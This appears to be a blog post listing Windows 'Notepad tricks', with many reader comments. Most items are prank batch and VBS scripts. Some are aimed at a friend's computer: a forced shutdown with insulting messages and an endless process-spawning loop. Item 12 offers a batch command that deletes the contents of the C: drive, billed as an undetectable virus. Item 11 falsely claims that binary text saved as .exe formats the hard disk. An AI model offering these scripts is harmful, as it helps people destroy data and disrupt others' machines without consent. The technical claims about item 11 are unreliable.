Hello Friends, Today On Just Web World, We are going to share some computer notepad tricks and hacks for you! Notepad is a simple text editor for Microsoft Windows OS and a basic text-editing program which enables computer users to create a documents. It has been included in all versions of Microsoft Windows since Windows 1.0 in 1985 to Windows 10.
The best notepad tricks are use for the tricking your Computer with some tricky codes. Here We are sharing notepad tricks codes that will use for something pranks. Here we are showing you top 19 Notepad Tricks, that will really made you crazy.
Notepad Tricks and Codes (Notepad CMD Tricks)
Funny Computer Notepad Tips, Tricks and Hacks
Table of Contents (TOC)
- Continually pop out CD Drive Using Notepad
- Convey your friend a lil’ message and shut down his / her computer
- Open Notepad continually in your friend’s computer
- Make A Personal Log-Book or A Diary
- Test Your Anti-Virus
- Matrix Effect
- Constantly Repeat Messages
- Toggle Keyboard Button Simultaneously
- Type “You are fool” Continuously
- Convert Text Into Audio Using Notepad
- Format Your Hard Disk Using Notepad
- Write your own simple virus cant detected by any antivirus
- Notepad Trick to type slowly
- How to Change Header and Footer in Notepad
1) Continually pop out CD Drive Using Notepad:
Type in Notepad.
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “AnyName.VBS”.
Like cdvirus.vbs
if you open this file your cd drive continually pop-out.
2) Convey your friend a lil’ message and shut down his / her computer:
Type in Notepad.
@echo off
msg * I don’t like you
shutdown -c “Error! You are stupid!” -s
Save it as “Anyname.BAT”.
Like notepadvirus.bat
3) Open Notepad continually in your friend’s computer:
Type in Notepad.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “Anyname.BAT” and send it.
4) Make A Personal Log-Book or A Diary:
Type in Notepad.
.LOG (in capital letters)
Save it as “Anyname.txt”.
Open it again.
When you open the file again you will see the current date and time being inserted automatically after the .LOG line.
This will happen automatically every time you reopen the the notepad file.
5) Test Your Anti-Virus:
You can also test your anti virus program for its effectiveness using a simple notepad trick.
Follow the steps below to know more:
Copy the code give below in the notepad file:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it as “Anyname.exe” like testvirus.exe
As soon as you save this file, your anti virus program will detect the file (virus) immediately and will attempt to delete it. If this happens then your Antivirus is working properly. If not, then its time to look for some other reliable program.
6) Matrix Effect:
Type in Notepad.
Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save the file with .bat extension like Matrix.bat
7) Constantly Repeat Messages:
Paste the following code in the notepad file.
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save the file with any file name but with .bat as extension and close it. For eg.message.bat
8) Toggle Keyboard Button Simultaneously:
1. Caps Lock Key
Open Notepad.
Paste the following code in the notepad file:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save the file with any name and .vbs extension. and close it.
Now open the newly created file and see how the caps lock key behaves on your keyboard!
9) Type “You are a fool” Continuously:
Open Notepad.
Paste the following code in the notepad file:
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save the file with any name but with .vbs extension and close it.
Open the file and see how it makes you type!
10) Convert Text Into Audio Using Notepad:
Open Notepad.
Copy and paste the below mentioned code.
Dim message, sapi message=InputBox(“Enter your text for conversion–Hacking-world.tk”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message
Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs
11) Format Your Hard Disk Using Just Notepad !
Ever wondered of a way to format your hard disk using just notepad ?
Open notepad.
Type the following the code in it (Or just copy paste it).
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
Save it as an .exe file giving any name you desire.
That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted !
This is just a little binary fun. Be Careful while using it.
12) Write your own simple virus cant detected by any antivirus:
@Echo off
Del C:\ *.* |y
And save that as .bat RUN IT
It will delete the content of C:\ drive.
Please Note:: don’t run that .bat file on your system… it will delete c: drive.
13) Notepad Trick to type slowly:
Open Notepad.
Paste the following code in the notepad file.
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Save the file with any name and with .vbs extension and close it.
14) How to Change Header and Footer in Notepad:
Go to File -> Page setup in notepad, and then in the fields for header and footer, type any of these codes.
&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number
40 Comments
AND NOW THURSTON PRESENTS SUNNY BOY AT PLAYTIME MR CONDUCTOR PLAYED WITH HIS BLOCKS DURING PLAYTIME 79. PLAYTIME V.
Thanks for sharing such an useful trick of notepad tricks. keep up the good work..
very huge its very easily thank you
Contunually pop out CD Drive is great prank to try on friend’s PC. Harshil you have written very well. Can we use their device from our home? please share more tricks.You are doing great work keep it up..!!!
That is very interesting Notepad Tricks, thanks for share this tricks with us. 🙂
Very good article. Easily explained. I would have never thought these notepad tricks we can do with notepad.
Cool tricks but I know one more which can tell you whether your computer is boy or girl . LOL it was fun to figure out that my computer is female.
Hi harshil great notepad tricks, from where are you learning these?
I am shocked to seen these notepad tricks!
Awesome notepad tricks and tips, I tried all and all are working fine.
I was Looking for something like this for my readers from so long.
Thank You for such a great Info 🙂
Regards,
Hemant.
Thanks !!
Hello Pankaj !!
Use this trick to shutdown pc through notepad..
@echo off
echo Enter(Y/N)?
pause
echo I will shutdown your PC in 5 seconds.
shutdown -s -t 05
Note:
-s : shutdown.
-r : Restart.
-l : Logoff.
-t : Time(After how many seconds should PC turn off).
-a : aborting the shutdown of PC
Save the code in .bat format.. 🙂
Your notepad tricks are best but tell me the method how to shutdown laptop through notepad.
You are Welcome.. Keep Visiting Our Website !!
Welcome and stay tuned !! We will update more notepad tricks and tips soon !!
Thanks Sanjay 🙂
Thanks and Enjoy these best notepad cmd tricks 😉
No:9 Tricks is about Type “You are a fool” Continuously !!
No:9 trick only format C drive ??
…lot to say, thank you..
Best Notepad Tricks you listed and explained very well..
finally got a nice informative website || you have really done a good job || carry on
i have also owner of a blog which deals with tricks and tutorials
Intresting Notepad Tricks thanks 🙂
Very good Post…Awesome Notepad Tricks..Thank you for sharing…
Thanks Kiran 🙂
Thanks Shana 🙂
Thanks Shweta 🙂 This Notepad Tricks Will Helps you.
Thanks Jenny I Think This Notepad Tricks will Helps you.
Thanks Basheer
Thanks Rahul 🙂
Great ticks, I had no clue about these notepad tricks. Thanks for sharing.
Wow!!! superb tricks!!! thank you for sharing…
Thank U..!!
Thanks..!!
appreaciative work!!!
soo super
super boss
U R also Best…!!
Believe in Your Self..!!!
nice harshit dear you are best
Thanks Ajay and Al..!!
nice collection keep it up